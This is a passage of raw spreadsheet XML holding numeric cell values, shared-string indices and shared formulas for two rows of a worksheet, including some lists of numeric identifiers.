        <v>8.0</v>
      </c>
      <c r="BC9" s="102">
        <v>14.0</v>
      </c>
      <c r="BD9" s="102">
        <v>28.0</v>
      </c>
      <c r="BE9" s="102">
        <v>0.0</v>
      </c>
      <c r="BF9" s="102">
        <v>0.0</v>
      </c>
      <c r="BG9" s="102">
        <v>0.0</v>
      </c>
      <c r="BH9" s="102">
        <v>0.0</v>
      </c>
      <c r="BI9" s="102">
        <v>8.0</v>
      </c>
      <c r="BJ9" s="102">
        <v>14.0</v>
      </c>
      <c r="BK9" s="102">
        <v>28.0</v>
      </c>
      <c r="BL9" s="103">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
      <c r="BM9" s="103">
        <f t="shared" si="4"/>
        <v>8</v>
      </c>
      <c r="BN9" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO9" s="103">
        <f t="shared" si="6"/>
        <v>14</v>
      </c>
      <c r="BP9" s="103">
        <f t="shared" si="7"/>
        <v>14</v>
      </c>
      <c r="BQ9" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR9" s="103">
        <f t="shared" si="9"/>
        <v>28</v>
      </c>
      <c r="BS9" s="103">
        <f t="shared" si="10"/>
        <v>28</v>
      </c>
      <c r="BT9" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU9" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV9" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW9" s="104" t="s">
        <v>351</v>
      </c>
      <c r="BX9" s="104">
        <v>1.0</v>
      </c>
      <c r="BY9" s="104">
        <v>34.0</v>
      </c>
      <c r="BZ9" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA9" s="104" t="s">
        <v>351</v>
      </c>
      <c r="CB9" s="104">
        <v>2.0</v>
      </c>
      <c r="CC9" s="104">
        <v>34.0</v>
      </c>
      <c r="CD9" s="104" t="s">
        <v>351</v>
      </c>
      <c r="CE9" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF9" s="104" t="str">
        <f t="shared" si="14"/>
        <v>402, 2044073</v>
      </c>
      <c r="CG9" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH9" s="104" t="str">
        <f t="shared" si="62"/>
        <v>402, 2044073</v>
      </c>
      <c r="CI9" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ9" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK9" s="104">
        <v>0.0</v>
      </c>
      <c r="CL9" s="104">
        <v>0.0</v>
      </c>
      <c r="CM9" s="105">
        <v>25.0</v>
      </c>
      <c r="CN9" s="105">
        <v>9.0</v>
      </c>
      <c r="CO9" s="105">
        <v>17.0</v>
      </c>
      <c r="CP9" s="105">
        <v>28.0</v>
      </c>
      <c r="CQ9" s="105">
        <v>6.0</v>
      </c>
      <c r="CR9" s="105">
        <v>34.0</v>
      </c>
      <c r="CS9" s="105">
        <v>0.0</v>
      </c>
      <c r="CT9" s="105">
        <v>0.0</v>
      </c>
      <c r="CU9" s="105">
        <v>0.0</v>
      </c>
      <c r="CV9" s="105">
        <v>0.0</v>
      </c>
      <c r="CW9" s="105">
        <v>9.0</v>
      </c>
      <c r="CX9" s="105">
        <v>17.0</v>
      </c>
      <c r="CY9" s="105">
        <v>28.0</v>
      </c>
      <c r="CZ9" s="105">
        <v>6.0</v>
      </c>
      <c r="DA9" s="105">
        <v>34.0</v>
      </c>
      <c r="DB9" s="106">
        <f t="shared" si="15"/>
        <v>9</v>
      </c>
      <c r="DC9" s="106">
        <f t="shared" si="16"/>
        <v>9</v>
      </c>
      <c r="DD9" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE9" s="106">
        <f t="shared" si="18"/>
        <v>17</v>
      </c>
      <c r="DF9" s="106">
        <f t="shared" si="19"/>
        <v>17</v>
      </c>
      <c r="DG9" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH9" s="106">
        <f t="shared" si="21"/>
        <v>34</v>
      </c>
      <c r="DI9" s="106">
        <f t="shared" si="22"/>
        <v>34</v>
      </c>
      <c r="DJ9" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK9" s="107">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="DL9" s="106">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="DM9" s="108" t="s">
        <v>351</v>
      </c>
      <c r="DN9" s="108">
        <v>2.0</v>
      </c>
      <c r="DO9" s="108">
        <v>34.0</v>
      </c>
      <c r="DP9" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ9" s="108" t="s">
        <v>351</v>
      </c>
      <c r="DR9" s="108">
        <v>2.0</v>
      </c>
      <c r="DS9" s="108">
        <v>34.0</v>
      </c>
      <c r="DT9" s="108" t="s">
        <v>351</v>
      </c>
      <c r="DU9" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV9" s="108" t="str">
        <f t="shared" si="63"/>
        <v>402, 2044073</v>
      </c>
      <c r="DW9" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX9" s="108" t="s">
        <v>351</v>
      </c>
      <c r="DY9" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ9" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA9" s="108">
        <v>0.0</v>
      </c>
      <c r="EB9" s="108">
        <v>0.0</v>
      </c>
      <c r="EC9" s="109">
        <v>26.0</v>
      </c>
      <c r="ED9" s="109">
        <v>9.0</v>
      </c>
      <c r="EE9" s="109">
        <v>17.0</v>
      </c>
      <c r="EF9" s="109">
        <v>28.0</v>
      </c>
      <c r="EG9" s="109">
        <v>6.0</v>
      </c>
      <c r="EH9" s="109">
        <v>34.0</v>
      </c>
      <c r="EI9" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ9" s="109">
        <v>0.0</v>
      </c>
      <c r="EK9" s="109">
        <v>0.0</v>
      </c>
      <c r="EL9" s="109">
        <v>0.0</v>
      </c>
      <c r="EM9" s="109">
        <v>9.0</v>
      </c>
      <c r="EN9" s="109">
        <v>17.0</v>
      </c>
      <c r="EO9" s="109">
        <v>28.0</v>
      </c>
      <c r="EP9" s="109">
        <v>6.0</v>
      </c>
      <c r="EQ9" s="109">
        <v>34.0</v>
      </c>
      <c r="ER9" s="110">
        <f t="shared" si="27"/>
        <v>9</v>
      </c>
      <c r="ES9" s="110">
        <f t="shared" si="28"/>
        <v>9</v>
      </c>
      <c r="ET9" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU9" s="110">
        <f t="shared" si="30"/>
        <v>17</v>
      </c>
      <c r="EV9" s="110">
        <f t="shared" si="31"/>
        <v>17</v>
      </c>
      <c r="EW9" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX9" s="110">
        <f t="shared" si="33"/>
        <v>34</v>
      </c>
      <c r="EY9" s="110">
        <f t="shared" si="34"/>
        <v>34</v>
      </c>
      <c r="EZ9" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA9" s="110">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="FB9" s="110">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="FC9" s="111" t="s">
        <v>352</v>
      </c>
      <c r="FD9" s="111">
        <v>5.0</v>
      </c>
      <c r="FE9" s="111">
        <v>76.0</v>
      </c>
      <c r="FF9" s="101" t="s">
        <v>353</v>
      </c>
      <c r="FG9" s="111" t="s">
        <v>354</v>
      </c>
      <c r="FH9" s="111">
        <v>2.0</v>
      </c>
      <c r="FI9" s="111">
        <v>34.0</v>
      </c>
      <c r="FJ9" s="111" t="s">
        <v>352</v>
      </c>
      <c r="FK9" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL9" s="111" t="str">
        <f t="shared" si="64"/>
        <v>2002752, 2002749, 2044073, 2100402, 402</v>
      </c>
      <c r="FM9" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN9" s="111" t="s">
        <v>352</v>
      </c>
      <c r="FO9" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP9" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ9" s="111">
        <v>0.0</v>
      </c>
      <c r="FR9" s="111">
        <v>0.0</v>
      </c>
      <c r="FS9" s="112">
        <v>25.0</v>
      </c>
      <c r="FT9" s="112">
        <v>14.0</v>
      </c>
      <c r="FU9" s="112">
        <v>26.0</v>
      </c>
      <c r="FV9" s="112">
        <v>28.0</v>
      </c>
      <c r="FW9" s="112">
        <v>48.0</v>
      </c>
      <c r="FX9" s="112">
        <v>76.0</v>
      </c>
      <c r="FY9" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ9" s="112">
        <v>0.0</v>
      </c>
      <c r="GA9" s="112">
        <v>0.0</v>
      </c>
      <c r="GB9" s="112">
        <v>0.0</v>
      </c>
      <c r="GC9" s="112">
        <v>9.0</v>
      </c>
      <c r="GD9" s="112">
        <v>17.0</v>
      </c>
      <c r="GE9" s="112">
        <v>28.0</v>
      </c>
      <c r="GF9" s="112">
        <v>6.0</v>
      </c>
      <c r="GG9" s="112">
        <v>34.0</v>
      </c>
      <c r="GH9" s="113">
        <f t="shared" si="39"/>
        <v>14</v>
      </c>
      <c r="GI9" s="113">
        <f t="shared" si="40"/>
        <v>9</v>
      </c>
      <c r="GJ9" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK9" s="113">
        <f t="shared" si="42"/>
        <v>26</v>
      </c>
      <c r="GL9" s="113">
        <f t="shared" si="43"/>
        <v>17</v>
      </c>
      <c r="GM9" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN9" s="113">
        <f t="shared" si="45"/>
        <v>76</v>
      </c>
      <c r="GO9" s="113">
        <f t="shared" si="46"/>
        <v>34</v>
      </c>
      <c r="GP9" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ9" s="114">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="GR9" s="113">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="GS9" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT9" s="94"/>
      <c r="GU9" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV9" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW9" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX9" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY9" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ9" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA9" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB9" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC9" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD9" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE9" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF9" s="117" t="str">
        <f t="shared" si="50"/>
        <v>-</v>
      </c>
      <c r="HG9" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH9" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI9" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ9" s="93" t="s">
        <v>355</v>
      </c>
      <c r="HK9" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL9" s="93">
        <v>23.0</v>
      </c>
      <c r="HM9" s="93">
        <f t="shared" si="52"/>
        <v>0</v>
      </c>
      <c r="HN9" s="93">
        <v>0.0</v>
      </c>
      <c r="HO9" s="93">
        <v>0.0</v>
      </c>
      <c r="HP9" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ9" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR9" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS9" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT9" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HU9" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV9" s="119">
        <v>31914.0</v>
      </c>
      <c r="HW9" s="119">
        <v>1.0</v>
      </c>
      <c r="HX9" s="119">
        <v>2.0</v>
      </c>
      <c r="HY9" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ9" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA9" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB9" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC9" s="120">
        <f t="shared" si="61"/>
        <v>31914</v>
      </c>
      <c r="ID9" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE9" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF9" s="120">
        <v>31914.0</v>
      </c>
      <c r="IG9" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH9" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II9" s="99" t="s">
        <v>356</v>
      </c>
      <c r="IJ9" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK9" s="99">
        <v>24.0</v>
      </c>
      <c r="IL9" s="99">
        <v>0.0</v>
      </c>
      <c r="IM9" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN9" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO9" s="98">
        <v>0.0</v>
      </c>
      <c r="IP9" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ9" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR9" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS9" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT9" s="127"/>
      <c r="IU9" s="127"/>
      <c r="IV9" s="127"/>
      <c r="IW9" s="127"/>
      <c r="IX9" s="127"/>
      <c r="IY9" s="127"/>
      <c r="IZ9" s="127"/>
      <c r="JA9" s="127"/>
      <c r="JB9" s="127"/>
      <c r="JC9" s="127"/>
      <c r="JD9" s="127"/>
      <c r="JE9" s="127"/>
      <c r="JF9" s="127"/>
      <c r="JG9" s="127"/>
      <c r="JH9" s="127"/>
      <c r="JI9" s="127"/>
      <c r="JJ9" s="127"/>
      <c r="JK9" s="127"/>
      <c r="JL9" s="127"/>
      <c r="JM9" s="127"/>
      <c r="JN9" s="127"/>
      <c r="JO9" s="127"/>
      <c r="JP9" s="127"/>
      <c r="JQ9" s="127"/>
      <c r="JR9" s="127"/>
      <c r="JS9" s="127"/>
      <c r="JT9" s="127"/>
      <c r="JU9" s="127"/>
      <c r="JV9" s="127"/>
      <c r="JW9" s="127"/>
      <c r="JX9" s="127"/>
      <c r="JY9" s="127"/>
      <c r="JZ9" s="127"/>
      <c r="KA9" s="127"/>
      <c r="KB9" s="127"/>
      <c r="KC9" s="127"/>
      <c r="KD9" s="127"/>
      <c r="KE9" s="127"/>
      <c r="KF9" s="127"/>
      <c r="KG9" s="127"/>
      <c r="KH9" s="127"/>
      <c r="KI9" s="127"/>
      <c r="KJ9" s="127"/>
      <c r="KK9" s="127"/>
      <c r="KL9" s="127"/>
      <c r="KM9" s="127"/>
      <c r="KN9" s="127"/>
      <c r="KO9" s="127"/>
      <c r="KP9" s="127"/>
      <c r="KQ9" s="127"/>
      <c r="KR9" s="127"/>
      <c r="KS9" s="127"/>
      <c r="KT9" s="127"/>
      <c r="KU9" s="127"/>
      <c r="KV9" s="127"/>
      <c r="KW9" s="127"/>
      <c r="KX9" s="127"/>
      <c r="KY9" s="127"/>
      <c r="KZ9" s="127"/>
      <c r="LA9" s="127"/>
      <c r="LB9" s="127"/>
      <c r="LC9" s="127"/>
      <c r="LD9" s="127"/>
      <c r="LE9" s="127"/>
      <c r="LF9" s="127"/>
      <c r="LG9" s="127"/>
      <c r="LH9" s="127"/>
      <c r="LI9" s="127"/>
      <c r="LJ9" s="127"/>
      <c r="LK9" s="127"/>
      <c r="LL9" s="127"/>
      <c r="LM9" s="127"/>
      <c r="LN9" s="127"/>
      <c r="LO9" s="127"/>
      <c r="LP9" s="127"/>
      <c r="LQ9" s="127"/>
      <c r="LR9" s="127"/>
      <c r="LS9" s="127"/>
      <c r="LT9" s="127"/>
      <c r="LU9" s="127"/>
      <c r="LV9" s="127"/>
      <c r="LW9" s="127"/>
      <c r="LX9" s="127"/>
      <c r="LY9" s="127"/>
      <c r="LZ9" s="127"/>
      <c r="MA9" s="127"/>
      <c r="MB9" s="127"/>
      <c r="MC9" s="127"/>
      <c r="MD9" s="127"/>
      <c r="ME9" s="127"/>
      <c r="MF9" s="127"/>
      <c r="MG9" s="127"/>
      <c r="MH9" s="127"/>
      <c r="MI9" s="127"/>
      <c r="MJ9" s="127"/>
      <c r="MK9" s="127"/>
      <c r="ML9" s="127"/>
      <c r="MM9" s="127"/>
      <c r="MN9" s="127"/>
      <c r="MO9" s="127"/>
      <c r="MP9" s="127"/>
      <c r="MQ9" s="127"/>
      <c r="MR9" s="127"/>
      <c r="MS9" s="127"/>
      <c r="MT9" s="127"/>
      <c r="MU9" s="127"/>
      <c r="MV9" s="127"/>
      <c r="MW9" s="127"/>
      <c r="MX9" s="127"/>
      <c r="MY9" s="127"/>
      <c r="MZ9" s="127"/>
      <c r="NA9" s="127"/>
      <c r="NB9" s="127"/>
      <c r="NC9" s="127"/>
      <c r="ND9" s="127"/>
      <c r="NE9" s="127"/>
      <c r="NF9" s="127"/>
      <c r="NG9" s="127"/>
      <c r="NH9" s="127"/>
      <c r="NI9" s="127"/>
      <c r="NJ9" s="127"/>
      <c r="NK9" s="127"/>
      <c r="NL9" s="127"/>
      <c r="NM9" s="127"/>
      <c r="NN9" s="127"/>
      <c r="NO9" s="127"/>
      <c r="NP9" s="127"/>
      <c r="NQ9" s="127"/>
      <c r="NR9" s="127"/>
      <c r="NS9" s="127"/>
      <c r="NT9" s="127"/>
      <c r="NU9" s="127"/>
      <c r="NV9" s="127"/>
      <c r="NW9" s="127"/>
      <c r="NX9" s="127"/>
      <c r="NY9" s="127"/>
    </row>
    <row r="10" ht="96.75" customHeight="1">
      <c r="B10" s="89" t="s">
        <v>357</v>
      </c>
      <c r="C10" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D10" s="90" t="s">
        <v>358</v>
      </c>
      <c r="E10" s="90" t="s">
        <v>359</v>
      </c>
      <c r="F10" s="90" t="s">
        <v>360</v>
      </c>
      <c r="G10" s="90" t="s">
        <v>218</v>
      </c>
      <c r="H10" s="90" t="s">
        <v>361</v>
      </c>
      <c r="I10" s="92" t="s">
        <v>362</v>
      </c>
      <c r="J10" s="92" t="s">
        <v>218</v>
      </c>
      <c r="K10" s="92" t="s">
        <v>363</v>
      </c>
      <c r="L10" s="93" t="s">
        <v>218</v>
      </c>
      <c r="M10" s="93">
        <v>1.0</v>
      </c>
      <c r="N10" s="93">
        <v>1.0</v>
      </c>
      <c r="O10" s="93">
        <v>0.0</v>
      </c>
      <c r="P10" s="93">
        <v>1.0</v>
      </c>
      <c r="Q10" s="93">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R10" s="93">
        <v>1.0</v>
      </c>
      <c r="S10" s="93">
        <v>0.0</v>
      </c>
      <c r="T10" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U10" s="98" t="s">
        <v>269</v>
      </c>
      <c r="V10" s="126" t="s">
        <v>364</v>
      </c>
      <c r="W10" s="126" t="s">
        <v>12</v>
      </c>
      <c r="X10" s="132" t="s">
        <v>365</v>
      </c>
      <c r="Y10" s="126" t="s">
        <v>366</v>
      </c>
      <c r="Z10" s="133" t="s">
        <v>367</v>
      </c>
      <c r="AA10" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB10" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC10" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD10" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE10" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF10" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG10" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH10" s="99" t="s">
        <v>368</v>
      </c>
      <c r="AI10" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ10" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK10" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL10" s="100">
        <v>0.0</v>
      </c>
      <c r="AM10" s="100">
        <v>0.0</v>
      </c>
      <c r="AN10" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO10" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP10" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ10" s="100">
        <v>0.0</v>
      </c>
      <c r="AR10" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS10" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT10" s="100" t="str">
        <f t="shared" si="2"/>
        <v>-</v>
      </c>
      <c r="AU10" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV10" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW10" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX10" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY10" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ10" s="100">
        <v>0.0</v>
      </c>
      <c r="BA10" s="102">
        <v>1.0</v>
      </c>
      <c r="BB10" s="102">
        <v>0.0</v>
      </c>
      <c r="BC10" s="102">
        <v>0.0</v>
      </c>
      <c r="BD10" s="102">
        <v>0.0</v>
      </c>
      <c r="BE10" s="102">
        <v>0.0</v>
      </c>
      <c r="BF10" s="102">
        <v>0.0</v>
      </c>
      <c r="BG10" s="102">
        <v>0.0</v>
      </c>
      <c r="BH10" s="102">
        <v>0.0</v>
      </c>
      <c r="BI10" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ10" s="102">
        <v>0.0</v>
      </c>
      <c r="BK10" s="102">
        <v>0.0</v>
      </c>
      <c r="BL10" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM10" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN10" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO10" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP10" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ10" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR10" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS10" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT10" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU10" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV10" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW10" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX10" s="104">
        <v>0.0</v>
      </c>
      <c r="BY10" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ10" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA10" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB10" s="104">
        <v>0.0</v>
      </c>
      <c r="CC10" s="104">
        <v>0.0</v>
      </c>
      <c r="CD10" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE10" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF10" s="104" t="str">
        <f t="shared" si="14"/>
        <v>-</v>
      </c>
      <c r="CG10" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH10" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI10" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ10" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK10" s="104">
        <v>0.0</v>
      </c>
      <c r="CL10" s="104">
        <v>0.0</v>
      </c>
      <c r="CM10" s="105">
        <v>1.0</v>
      </c>
      <c r="CN10" s="105">
        <v>0.0</v>
      </c>
      <c r="CO10" s="105">
        <v>0.0</v>
      </c>
      <c r="CP10" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ10" s="105">
        <v>0.0</v>
      </c>
      <c r="CR10" s="105">
        <v>0.0</v>
      </c>
      <c r="CS10" s="105">
        <v>0.0</v>
      </c>
      <c r="CT10" s="105">
        <v>0.0</v>
      </c>
      <c r="CU10" s="105">
        <v>0.0</v>
      </c>
      <c r="CV10" s="105">
        <v>0.0</v>
      </c>
      <c r="CW10" s="105">
        <v>0.0</v>
      </c>
      <c r="CX10" s="105">
        <v>0.0</v>
      </c>
      <c r="CY10" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ10" s="105">
        <v>0.0</v>
      </c>
      <c r="DA10" s="105">
        <v>0.0</v>
      </c>
      <c r="DB10" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC10" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD10" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE10" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF10" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG10" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH10" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI10" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ10" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK10" s="107">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="DL10" s="106">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="DM10" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN10" s="108">
        <v>0.0</v>
      </c>
      <c r="DO10" s="108">
        <v>0.0</v>
      </c>
      <c r="DP10" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ10" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR10" s="108">
        <v>0.0</v>
      </c>
      <c r="DS10" s="108">
        <v>0.0</v>
      </c>
      <c r="DT10" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU10" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV10" s="108" t="str">
        <f t="shared" si="63"/>
        <v>-</v>
      </c>
      <c r="DW10" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX10" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY10" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ10" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA10" s="108">
        <v>0.0</v>
      </c>
      <c r="EB10" s="108">
        <v>0.0</v>
      </c>
      <c r="EC10" s="109">
        <v>1.0</v>
      </c>
      <c r="ED10" s="109">
        <v>0.0</v>
      </c>
      <c r="EE10" s="109">
        <v>0.0</v>
      </c>
      <c r="EF10" s="109">
        <v>0.0</v>
      </c>
      <c r="EG10" s="109">
        <v>0.0</v>
      </c>
      <c r="EH10" s="109">
        <v>0.0</v>
      </c>
      <c r="EI10" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ10" s="109">
        <v>0.0</v>
      </c>
      <c r="EK10" s="109">
        <v>0.0</v>
      </c>
      <c r="EL10" s="109">
        <v>0.0</v>
      </c>
      <c r="EM10" s="109">
        <v>0.0</v>
      </c>
      <c r="EN10" s="109">
        <v>0.0</v>
      </c>
      <c r="EO10" s="109">
        <v>0.0</v>
      </c>
      <c r="EP10" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ10" s="109">
        <v>0.0</v>
      </c>
      <c r="ER10" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES10" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET10" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU10" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV10" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW10" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX10" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY10" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ10" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA10" s="110">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="FB10" s="110">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="FC10" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FD10" s="111">
        <v>2.0</v>
      </c>
      <c r="FE10" s="111">
        <v>4.0</v>
      </c>
      <c r="FF10" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG10" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH10" s="111">
        <v>0.0</v>
      </c>
      <c r="FI10" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ10" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK10" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL10" s="111" t="str">
        <f t="shared" si="64"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM10" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN10" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO10" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP10" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ10" s="111">
        <v>0.0</v>
      </c>
      <c r="FR10" s="111">
        <v>0.0</v>
      </c>
